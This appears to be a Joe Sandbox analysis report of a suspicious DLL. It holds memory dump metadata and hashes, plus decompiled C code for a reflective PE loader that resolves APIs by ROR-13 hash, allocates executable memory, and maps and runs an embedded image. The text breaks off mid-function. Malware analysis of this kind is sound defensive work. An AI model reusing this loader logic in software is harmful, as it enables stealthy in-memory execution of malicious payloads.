Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 5707ec182c4fa29f9edf9a94eaa77e1f4e8f7d8b993a12eb1024fd7c8eb50fc0
Instruction ID: 1f0270f38b2d4aafe0ae2c99b44092d91d58301137940ce60eccabf80f4ee130
Opcode Fuzzy Hash: 5707ec182c4fa29f9edf9a94eaa77e1f4e8f7d8b993a12eb1024fd7c8eb50fc0
Instruction Fuzzy Hash: BC21D771604316AFDB559FEACC90A9BB7BDFF413657004929E91497A24F730EC508790

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE7EA6, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6ECE7857,?,00000001,?,?,?,6ECE6B46,?,?,00000000), ref: 6ECE7EBD
GetLastError.KERNEL32(?,6ECE7857,?,00000001,?,?,?,6ECE6B46,?,?,00000000,?,?,?,6ECE70CD,?), ref: 6ECE7EC9

Part of subcall function 6ECE7E8F: CloseHandle.KERNEL32(FFFFFFFE,6ECE7ED9,?,6ECE7857,?,00000001,?,?,?,6ECE6B46,?,?,00000000,?,?), ref: 6ECE7E9F

___initconout.LIBCMT ref: 6ECE7ED9

Part of subcall function 6ECE7E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6ECE7E80,6ECE7844,?,?,6ECE6B46,?,?,00000000,?), ref: 6ECE7E64

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6ECE7857,?,00000001,?,?,?,6ECE6B46,?,?,00000000,?), ref: 6ECE7EEE

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 474ef8576a11256ba755c9f7207f7e336c1141b8b1f731fcf79eda6099011501
Instruction ID: dc2d12493e671d935b42ca1412dbbec50378a3f5283288db6d5a4e0d966d8e6b
Opcode Fuzzy Hash: 474ef8576a11256ba755c9f7207f7e336c1141b8b1f731fcf79eda6099011501
Instruction Fuzzy Hash: 66F0F236000618BFCF525FD1CC09A9E3F36EF8A3A0B044410FE2986964D7328C60AB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDFAA0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6ECDFAC5

Strings

MOC, xrefs: 6ECDFAD7
RCC, xrefs: 6ECDFADF

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 2805fb9c02d9954c2090837fcb88a9d1b34c989453dbbd0c87a69f0106fef842
Instruction ID: e526ca3365c2e67f0dd2efc27411750f4cf0f6a69ef948f5642449aabbf42156
Opcode Fuzzy Hash: 2805fb9c02d9954c2090837fcb88a9d1b34c989453dbbd0c87a69f0106fef842
Instruction Fuzzy Hash: BA414732900149BFCF05CF94C990EEEBBB9BF48304F248499EA15A6254E3369955DB51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4540 Parent PID: 5808 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1218
Total number of Limit Nodes:	15

Executed Functions

Function 6ECDC050, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394
filememoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E6ECDC050(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				intOrPtr _t139;
				struct HDC__* _t144;
				void* _t152;
				signed int _t153;
				void* _t154;
				void* _t164;
				signed int _t167;
				signed int _t169;
				unsigned short _t171;
				void* _t176;
				signed int _t178;
				char _t189;
				void* _t192;
				signed int _t193;
				signed int _t196;
				signed int _t202;
				intOrPtr _t204;
				signed int _t205;
				signed int _t207;
				intOrPtr _t208;
				void* _t209;
				void* _t210;
				signed int _t212;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr* _t219;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed short _t230;
				void* _t235;
				signed int _t236;
				signed int _t237;
				void* _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t249;
				signed int _t250;
				intOrPtr* _t252;
				intOrPtr* _t255;
				intOrPtr* _t256;
				void* _t258;
				intOrPtr* _t260;
				unsigned int _t262;
				intOrPtr* _t264;
				void* _t265;
				void* _t266;
				signed int* _t268;
				signed int _t270;
				signed int _t271;
				intOrPtr* _t273;
				signed int _t277;
				void* _t278;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t283;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed char* _t289;
				intOrPtr _t290;
				signed int _t292;
				void* _t293;
				signed short* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;

				_t137 =  *0x6ed1d804; // 0x15bff9f6
				 *(_t299 + 0x4c) = _t137 ^ _t299;
				_t255 =  *((intOrPtr*)(_t299 + 0x64));
				_push(0x400);
				 *((intOrPtr*)(_t299 + 0x2c)) = _t255;
				_t139 = E6ECDC70E(__eflags);
				_t256 =  *_t255;
				_t300 = _t299 + 4;
				_t202 = 0;
				 *((intOrPtr*)(_t300 + 0x2c)) = _t139;
				 *(_t300 + 0x24) = 0;
				 *(_t300 + 0x18) = 0;
				 *(_t300 + 0x20) = 0;
				L1:
				while(1) {
					if( *_t256 != 0x5a4d) {
						L4:
						_t256 = _t256 - 1;
						continue;
					}
					_t216 =  *((intOrPtr*)(_t256 + 0x3c));
					if(_t216 - 0x40 > 0x3bf ||  *((intOrPtr*)(_t216 + _t256)) != 0x4550) {
						goto L4;
					}
					 *((intOrPtr*)(_t300 + 0x14)) = _t256;
					_t292 =  *( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14);
					 *(_t300 + 0x1c) = _t292;
					__eflags = _t292;
					if(_t292 != 0) {
						do {
							_t289 =  *(_t292 + 0x28);
							_t236 = 0;
							__eflags = 0;
							_t250 =  *(_t292 + 0x24) & 0x0000ffff;
							do {
								_t271 =  *_t289 & 0x000000ff;
								asm("ror ecx, 0xd");
								__eflags =  *_t289 - 0x61;
								if( *_t289 >= 0x61) {
									_t236 = _t236 + 0xffffffe0;
									__eflags = _t236;
								}
								_t250 = _t250 + 0xffff;
								_t236 = _t236 + _t271;
								_t289 =  &(_t289[1]);
								__eflags = _t250;
							} while (_t250 != 0);
							__eflags = _t236 - 0x6a4abc5b;
							if(_t236 == 0x6a4abc5b) {
								_t290 =  *((intOrPtr*)(_t292 + 0x10));
								_t298 = 3;
								_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x3c)) + _t290 + 0x78)) + _t290;
								 *(_t300 + 0x10) = _t192;
								_t273 =  *((intOrPtr*)(_t192 + 0x20)) + _t290;
								_t215 =  *((intOrPtr*)(_t192 + 0x24)) + _t290;
								__eflags = _t215;
								do {
									_t252 =  *_t273 + _t290;
									_t193 = 0;
									__eflags = 0;
									_t237 =  *_t252;
									do {
										asm("ror eax, 0xd");
										_t252 = _t252 + 1;
										_t193 = _t193 + _t237;
										_t237 =  *_t252;
										__eflags = _t237;
									} while (_t237 != 0);
									__eflags = _t193 - 0xec0e4e8e;
									if(_t193 == 0xec0e4e8e) {
										L18:
										_t241 =  *((intOrPtr*)( *(_t300 + 0x10) + 0x1c)) + ( *_t215 & 0x0000ffff) * 4;
										__eflags = _t193 - 0xec0e4e8e;
										if(_t193 != 0xec0e4e8e) {
											__eflags = _t193 - 0x7c0dfcaa;
											if(_t193 != 0x7c0dfcaa) {
												__eflags = _t193 - 0x91afca54;
												if(_t193 == 0x91afca54) {
													_t196 =  *((intOrPtr*)(_t241 + _t290)) + 0x57 + _t290;
													__eflags = _t196;
													 *(_t300 + 0x20) = _t196;
												}
											} else {
												 *(_t300 + 0x18) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
											}
										} else {
											 *(_t300 + 0x24) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
										}
										_t298 = _t298 + 0xffff;
										__eflags = _t298;
									} else {
										__eflags = _t193 - 0x7c0dfcaa;
										if(_t193 == 0x7c0dfcaa) {
											goto L18;
										} else {
											__eflags = _t193 - 0x91afca54;
											if(_t193 == 0x91afca54) {
												goto L18;
											}
										}
									}
									_t273 = _t273 + 4;
									_t215 = _t215 + 2;
									__eflags = _t298;
								} while (_t298 != 0);
								_t202 =  *(_t300 + 0x18);
								_t292 =  *(_t300 + 0x1c);
							}
							__eflags =  *(_t300 + 0x24);
							if( *(_t300 + 0x24) == 0) {
								goto L30;
							} else {
								__eflags = _t202;
								if(_t202 == 0) {
									goto L30;
								} else {
									__eflags =  *(_t300 + 0x20);
									if( *(_t300 + 0x20) == 0) {
										goto L30;
									}
								}
							}
							break;
							L30:
							_t292 =  *_t292;
							 *(_t300 + 0x1c) = _t292;
							__eflags = _t292;
						} while (_t292 != 0);
						_t256 =  *((intOrPtr*)(_t300 + 0x14));
					}
					 *((intOrPtr*)(_t300 + 0x34)) = GetDC;
					_t144 = GetDC(0);
					 *(_t300 + 0x3c) = GetWindowRect;
					GetWindowRect(0, _t300 + 0x3c);
					 *((intOrPtr*)(_t300 + 0x40)) = ReleaseDC;
					ReleaseDC(0, _t144);
					_t204 =  *((intOrPtr*)(_t256 + 0x3c)) + _t256;
					 *((intOrPtr*)(_t300 + 0x38)) = _t204;
					CreateFileA("asd", 0, 0, 0, 0, 0, 0);
					 *((intOrPtr*)(_t300 + 0x30)) =  *(_t300 + 0x20) - GetLastError();
					_t152 = VirtualAlloc(0,  *(_t204 + 0x50), 0x3000, 0x40); // executed
					_t243 =  *(_t204 + 0x54);
					_t293 = _t152;
					 *(_t300 + 0x10) = _t293;
					_t219 = _t256;
					__eflags = _t243;
					if(_t243 != 0) {
						_t288 = _t293 - _t256;
						__eflags = _t288;
						do {
							_t189 =  *_t219;
							_t219 = _t219 + 1;
							 *((char*)(_t288 + _t219 - 1)) = _t189;
							_t243 = _t243 - 1;
							__eflags = _t243;
						} while (_t243 != 0);
					}
					_t258 = ( *(_t204 + 0x14) & 0x0000ffff) + _t204;
					_t205 =  *(_t204 + 6) & 0x0000ffff;
					__eflags = _t205;
					if(_t205 != 0) {
						_t270 = _t258 + 0x2c;
						__eflags = _t270;
						do {
							_t205 = _t205 - 1;
							 *((char*)((_t205 & 0x000003ff) +  *((intOrPtr*)(_t300 + 0x2c)))) =  *(_t300 + 0x20);
							_t235 =  *((intOrPtr*)(_t270 - 8)) + _t293;
							_t249 =  *_t270 +  *((intOrPtr*)(_t300 + 0x14));
							_t286 =  *(_t270 - 4);
							__eflags = _t286;
							if(_t286 != 0) {
								do {
									_t235 = _t235 + 1;
									 *((char*)(_t235 - 1)) =  *_t249;
									_t249 = _t249 + 1;
									_t286 = _t286 - 1;
									__eflags = _t286;
								} while (_t286 != 0);
							}
							_t270 = _t270 + 0x28;
							__eflags = _t205;
						} while (_t205 != 0);
					}
					_t207 =  *(_t300 + 0x1c) - 0xffffff80;
					_t260 = _t293 +  *_t207;
					 *((intOrPtr*)(_t300 + 0x14)) = _t260;
					_t153 =  *(_t260 + 0xc);
					__eflags = _t153;
					if(_t153 != 0) {
						while(1) {
							__eflags =  *_t207;
							if( *_t207 == 0) {
								goto L50;
							}
							_t297 =  *((intOrPtr*)(_t300 + 0x28))(_t293 + _t153);
							_t176 =  *(_t300 + 0x10);
							_t285 =  *_t260 + _t176;
							_t268 =  *((intOrPtr*)(_t260 + 0x10)) + _t176;
							__eflags =  *_t268;
							if( *_t268 != 0) {
								asm("o16 nop [eax+eax]");
								do {
									__eflags = _t285;
									if(_t285 == 0) {
										L47:
										_t207 = _t176 +  *_t268;
										__eflags = _t207;
										_t178 =  *(_t300 + 0x20)(_t297, _t207 + 2);
									} else {
										_t230 =  *_t285;
										__eflags = _t230;
										if(_t230 >= 0) {
											goto L47;
										} else {
											_t178 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x1c)) + ((_t230 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x10))) * 4 + _t297)) + _t297;
										}
									}
									 *_t268 = _t178;
									_t268 =  &(_t268[1]);
									__eflags = _t285;
									_t84 = _t285 + 4; // 0x4
									_t180 =  ==  ? _t285 : _t84;
									__eflags =  *_t268;
									_t285 =  ==  ? _t285 : _t84;
									_t176 =  *(_t300 + 0x10);
								} while ( *_t268 != 0);
							}
							_t293 =  *(_t300 + 0x10);
							_t260 =  *((intOrPtr*)(_t300 + 0x14)) + 0x14;
							 *((intOrPtr*)(_t300 + 0x14)) = _t260;
							_t153 =  *(_t260 + 0xc);
							__eflags = _t153;
							if(_t153 != 0) {
								continue;
							}
							goto L50;
						}
					}
					L50:
					_t154 =  *((intOrPtr*)(_t300 + 0x34))(0);
					 *(_t300 + 0x3c)(0, _t300 + 0x4c);
					 *((intOrPtr*)(_t300 + 0x40))(0, _t154);
					_t244 =  *(_t300 + 0x1c);
					_t262 = _t293 -  *((intOrPtr*)(_t244 + 0x34));
					__eflags =  *(_t244 + 0xa4);
					if( *(_t244 + 0xa4) != 0) {
						_t225 =  *((intOrPtr*)(_t244 + 0xa0)) + _t293;
						 *(_t300 + 0x18) = _t225;
						_t169 =  *(_t225 + 4);
						__eflags = _t169;
						if(_t169 != 0) {
							do {
								_t100 = _t169 - 8; // -8
								_t283 =  *_t225 + _t293;
								_t212 = _t100 >> 1;
								__eflags = _t212;
								_t296 = _t225 + 8;
								if(_t212 != 0) {
									do {
										_t245 =  *_t296 & 0x0000ffff;
										_t212 = _t212 - 1;
										_t226 = _t245;
										_t171 = _t245 >> 0xc;
										__eflags = _t171 - 0xa;
										if(_t171 != 0xa) {
											__eflags = _t171 - 3;
											if(_t171 != 3) {
												__eflags = _t171 - 1;
												if(_t171 != 1) {
													__eflags = _t171 - 2;
													if(_t171 == 2) {
														_t227 = _t226 & 0x00000fff;
														_t108 = _t227 + _t283;
														 *_t108 =  *(_t227 + _t283) + _t262;
														__eflags =  *_t108;
													}
												} else {
													 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + (_t262 >> 0x10);
												}
											} else {
												 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + _t262;
											}
										} else {
											 *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) + _t262;
										}
										_t296 =  &(_t296[1]);
										__eflags = _t212;
									} while (_t212 != 0);
									_t225 =  *(_t300 + 0x18);
									_t169 =  *(_t225 + 4);
								}
								_t293 =  *(_t300 + 0x10);
								_t225 = _t225 + _t169;
								 *(_t300 + 0x18) = _t225;
								_t169 =  *(_t225 + 4);
								__eflags = _t169;
							} while (_t169 != 0);
							_t244 =  *(_t300 + 0x1c);
						}
					}
					 *0x6ed1e168 = _t293;
					_t264 =  *((intOrPtr*)(_t244 + 0x28)) + _t293;
					_t277 =  *( *((intOrPtr*)(_t293 + 0x3c)) + _t293 + 0xc0);
					__eflags = _t277;
					if(_t277 != 0) {
						_t281 =  *(_t277 + _t293 + 0xc);
						__eflags = _t281;
						if(_t281 != 0) {
							_t167 =  *_t281;
							__eflags = _t167;
							while(_t167 != 0) {
								 *_t167(_t293, 1, 0);
								_t167 =  *(_t281 + 4);
								_t281 = _t281 + 4;
								__eflags = _t167;
							}
						}
					}
					_t208 =  *((intOrPtr*)(_t300 + 0x28));
					__eflags =  *(_t208 + 0x1c);
					if( *(_t208 + 0x1c) != 0) {
						 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
						goto L77;
					} else {
						_push( *((intOrPtr*)(_t208 + 4)));
						_push(_t293);
						_t279 = E6ECDBF10();
						_t300 = _t300 + 8;
						__eflags = _t279;
						if(_t279 == 0) {
							L77:
							_pop(_t265);
							_pop(_t278);
							_pop(_t209);
							__eflags =  *(_t300 + 0x5c) ^ _t300;
							return E6ECDC717( *((intOrPtr*)(_t300 + 0x28)), _t209,  *(_t300 + 0x5c) ^ _t300, _t244, _t265, _t278);
						} else {
							__eflags =  *(_t208 + 0x20);
							if( *(_t208 + 0x20) != 0) {
								E6ECDBFE0(_t293);
								_t300 = _t300 + 4;
							}
							 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
							_t164 =  *_t279( *((intOrPtr*)(_t208 + 0xc)),  *((intOrPtr*)(_t208 + 0x10)),  *((intOrPtr*)(_t208 + 0x14)),  *((intOrPtr*)(_t208 + 0x18)));
							_pop(_t266);
							_pop(_t280);
							_pop(_t210);
							__eflags =  *(_t300 + 0x4c) ^ _t300;
							return E6ECDC717(_t164, _t210,  *(_t300 + 0x4c) ^ _t300, _t244, _t266, _t280);
						}
					}
				}
			}

0x6ecdc053
0x6ecdc05a
0x6ecdc062
0x6ecdc066
0x6ecdc06b
0x6ecdc06f
0x6ecdc074
0x6ecdc076
0x6ecdc079
0x6ecdc07b
0x6ecdc07f
0x6ecdc08c
0x6ecdc090
0x00000000
0x6ecdc094
0x6ecdc097
0x6ecdc0af
0x6ecdc0af
0x00000000
0x6ecdc0af
0x6ecdc099
0x6ecdc0a4
0x00000000
0x00000000
0x6ecdc0b8
0x6ecdc0bf
0x6ecdc0c2
0x6ecdc0c6
0x6ecdc0c8
0x6ecdc0d0
0x6ecdc0d0
0x6ecdc0d3
0x6ecdc0d3
0x6ecdc0d5
0x6ecdc0e0
0x6ecdc0e0
0x6ecdc0e3
0x6ecdc0e6
0x6ecdc0e9
0x6ecdc0eb
0x6ecdc0eb
0x6ecdc0eb
0x6ecdc0ee
0x6ecdc0f4
0x6ecdc0f6
0x6ecdc0f7
0x6ecdc0f7
0x6ecdc0fc
0x6ecdc102
0x6ecdc108
0x6ecdc10b
0x6ecdc117
0x6ecdc119
0x6ecdc123
0x6ecdc125
0x6ecdc125
0x6ecdc127
0x6ecdc129
0x6ecdc12b
0x6ecdc12b
0x6ecdc12d
0x6ecdc130
0x6ecdc130
0x6ecdc133
0x6ecdc139
0x6ecdc13b
0x6ecdc13d
0x6ecdc13d
0x6ecdc141
0x6ecdc146
0x6ecdc156
0x6ecdc160
0x6ecdc163
0x6ecdc168
0x6ecdc175
0x6ecdc17a
0x6ecdc187
0x6ecdc18c
0x6ecdc194
0x6ecdc194
0x6ecdc196
0x6ecdc196
0x6ecdc17c
0x6ecdc181
0x6ecdc181
0x6ecdc16a
0x6ecdc16f
0x6ecdc16f
0x6ecdc19a
0x6ecdc19a
0x6ecdc148
0x6ecdc148
0x6ecdc14d
0x00000000
0x6ecdc14f
0x6ecdc14f
0x6ecdc154
0x00000000
0x00000000
0x6ecdc154
0x6ecdc14d
0x6ecdc1a0
0x6ecdc1a3
0x6ecdc1a6
0x6ecdc1a6
0x6ecdc1af
0x6ecdc1b3
0x6ecdc1b3
0x6ecdc1b7
0x6ecdc1bc
0x00000000
0x6ecdc1be
0x6ecdc1be
0x6ecdc1c0
0x00000000
0x6ecdc1c2
0x6ecdc1c2
0x6ecdc1c7
0x00000000
0x00000000
0x6ecdc1c7
0x6ecdc1c0
0x00000000
0x6ecdc1c9
0x6ecdc1c9
0x6ecdc1cc
0x6ecdc1d0
0x6ecdc1d0
0x6ecdc1d8
0x6ecdc1d8
0x6ecdc1e3
0x6ecdc1e7
0x6ecdc1f7
0x6ecdc1fb
0x6ecdc205
0x6ecdc209
0x6ecdc21a
0x6ecdc221
0x6ecdc225
0x6ecdc243
0x6ecdc247
0x6ecdc249
0x6ecdc24c
0x6ecdc24e
0x6ecdc252
0x6ecdc254
0x6ecdc256
0x6ecdc25a
0x6ecdc25a
0x6ecdc260
0x6ecdc260
0x6ecdc262
0x6ecdc265
0x6ecdc269
0x6ecdc269
0x6ecdc269
0x6ecdc260
0x6ecdc272
0x6ecdc274
0x6ecdc278
0x6ecdc27a
0x6ecdc27c
0x6ecdc27c
0x6ecdc280
0x6ecdc284
0x6ecdc290
0x6ecdc298
0x6ecdc29a
0x6ecdc29e
0x6ecdc2a1
0x6ecdc2a3
0x6ecdc2a5
0x6ecdc2a7
0x6ecdc2aa
0x6ecdc2ad
0x6ecdc2b0
0x6ecdc2b0
0x6ecdc2b0
0x6ecdc2a5
0x6ecdc2b5
0x6ecdc2b8
0x6ecdc2b8
0x6ecdc280
0x6ecdc2c0
0x6ecdc2c5
0x6ecdc2c7
0x6ecdc2cb
0x6ecdc2ce
0x6ecdc2d0
0x6ecdc2d6
0x6ecdc2d6
0x6ecdc2d9
0x00000000
0x00000000
0x6ecdc2e8
0x6ecdc2ea
0x6ecdc2ee
0x6ecdc2f3
0x6ecdc2f5
0x6ecdc2f8
0x6ecdc2fa
0x6ecdc300
0x6ecdc300
0x6ecdc302
0x6ecdc326
0x6ecdc328
0x6ecdc328
0x6ecdc32f
0x6ecdc304
0x6ecdc304
0x6ecdc306
0x6ecdc308
0x00000000
0x6ecdc30a
0x6ecdc322
0x6ecdc322
0x6ecdc308
0x6ecdc333
0x6ecdc335
0x6ecdc338
0x6ecdc33a
0x6ecdc33d
0x6ecdc340
0x6ecdc343
0x6ecdc345
0x6ecdc345
0x6ecdc300
0x6ecdc34f
0x6ecdc353
0x6ecdc356
0x6ecdc35a
0x6ecdc35d
0x6ecdc35f
0x00000000
0x00000000
0x00000000
0x6ecdc35f
0x6ecdc2d6
0x6ecdc365
0x6ecdc367
0x6ecdc374
0x6ecdc37b
0x6ecdc37f
0x6ecdc385
0x6ecdc388
0x6ecdc38f
0x6ecdc39b
0x6ecdc39d
0x6ecdc3a1
0x6ecdc3a4
0x6ecdc3a6
0x6ecdc3b0
0x6ecdc3b2
0x6ecdc3b5
0x6ecdc3b7
0x6ecdc3b7
0x6ecdc3b9
0x6ecdc3bc
0x6ecdc3c0
0x6ecdc3c0
0x6ecdc3c4
0x6ecdc3c8
0x6ecdc3ca
0x6ecdc3ce
0x6ecdc3d2
0x6ecdc3df
0x6ecdc3e3
0x6ecdc3f0
0x6ecdc3f4
0x6ecdc407
0x6ecdc40b
0x6ecdc40d
0x6ecdc413
0x6ecdc413
0x6ecdc413
0x6ecdc413
0x6ecdc3f6
0x6ecdc401
0x6ecdc401
0x6ecdc3e5
0x6ecdc3eb
0x6ecdc3eb
0x6ecdc3d4
0x6ecdc3da
0x6ecdc3da
0x6ecdc417
0x6ecdc41a
0x6ecdc41a
0x6ecdc41e
0x6ecdc422
0x6ecdc422
0x6ecdc425
0x6ecdc429
0x6ecdc42b
0x6ecdc42f
0x6ecdc432
0x6ecdc432
0x6ecdc43a
0x6ecdc43a
0x6ecdc3a6
0x6ecdc441
0x6ecdc447
0x6ecdc44c
0x6ecdc453
0x6ecdc455
0x6ecdc457
0x6ecdc45b
0x6ecdc45d
0x6ecdc45f
0x6ecdc461
0x6ecdc463
0x6ecdc46a
0x6ecdc46c
0x6ecdc46f
0x6ecdc472
0x6ecdc472
0x6ecdc463
0x6ecdc45d
0x6ecdc476
0x6ecdc47a
0x6ecdc47e
0x6ecdc4d2
0x00000000
0x6ecdc480
0x6ecdc480
0x6ecdc483
0x6ecdc489
0x6ecdc48b
0x6ecdc48e
0x6ecdc490
0x6ecdc4d4
0x6ecdc4dc
0x6ecdc4dd
0x6ecdc4df
0x6ecdc4e0
0x6ecdc4ea
0x6ecdc492
0x6ecdc492
0x6ecdc496
0x6ecdc499
0x6ecdc49e
0x6ecdc49e
0x6ecdc4a8
0x6ecdc4b6
0x6ecdc4b8
0x6ecdc4b9
0x6ecdc4bb
0x6ecdc4c0
0x6ecdc4ca
0x6ecdc4ca
0x6ecdc490
0x6ecdc47e

APIs

CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ECDC225
GetLastError.KERNEL32 ref: 6ECDC22B
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 6ECDC247

Strings

asd, xrefs: 6ECDC21C

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AllocCreateErrorFileLastVirtual
String ID: asd
API String ID: 1112224254-4170839921
Opcode ID: 98c4c550200e4594a3c84d7fb2bfda72867c5b4c02cf272e159a5a3251434ebb
Instruction ID: daedb5bacbb990303d02fd863c3241e94c6e6921dc05b416d8a6764c66dbd135
Opcode Fuzzy Hash: 98c4c550200e4594a3c84d7fb2bfda72867c5b4c02cf272e159a5a3251434ebb
Instruction Fuzzy Hash: 3AE18A71A083168FC750CF98C890B6AB7F1FF88714F15496DEA958B349E732E859CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDC8DB, Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E6ECDC8DB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;
				void* _t89;

				_t89 = __fp0;
				_t68 = __edx;
				_push(0x10);
				_push(0x6ed1af80);
				E6ECDD350(__ebx, __edi, __esi);
				_t34 =  *0x6ed1e174; // 0x0
				if(_t34 > 0) {
					 *0x6ed1e174 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6ECDCF32();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6ed1e4b8 - 2;
					if( *0x6ed1e4b8 != 2) {
						E6ECDD1CC(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6ed1afa8);
						E6ECDD350(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6ECDCA96( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6ECDC781(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t42 = E6ECC1290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t72); // executed
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6ECC1290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6ECDC8DB(_t58, _t68, _t72, _t76, _t25, _t89);
											_pop(_t61);
